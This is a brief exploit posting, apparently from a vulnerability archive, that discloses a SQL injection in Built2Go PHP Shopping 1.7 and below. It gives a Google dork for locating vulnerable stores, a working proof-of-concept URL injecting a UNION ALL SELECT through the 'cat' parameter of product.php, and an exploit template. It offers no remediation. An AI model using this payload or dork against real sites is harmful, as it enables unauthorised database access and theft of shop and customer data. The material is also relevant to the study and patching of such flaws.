Built2Go PHP Shopping versions 1.7 and below suffer from a remote SQL injection vulnerability.
3d5b69c778fd0219eb5dd512daeaa9345a9ab4140e7827f624e6894abbe6dcf1
Script Name: Built2Go PHP Shopping ( version ) <= 1.7
Site: http://built2go.com/
Script Demo: http://demos.built2go.com/shopping/1/
Found: Br0ly
Google Dork: "Powered by Built2Go PHP Shopping"
p0c:
http://server.com/product.php?cat=16'%20UNION%20ALL%20SELECT%201,@@version,3/*
xPloit:
http://server.com/product.php?cat=[sqli]
Brazil ;D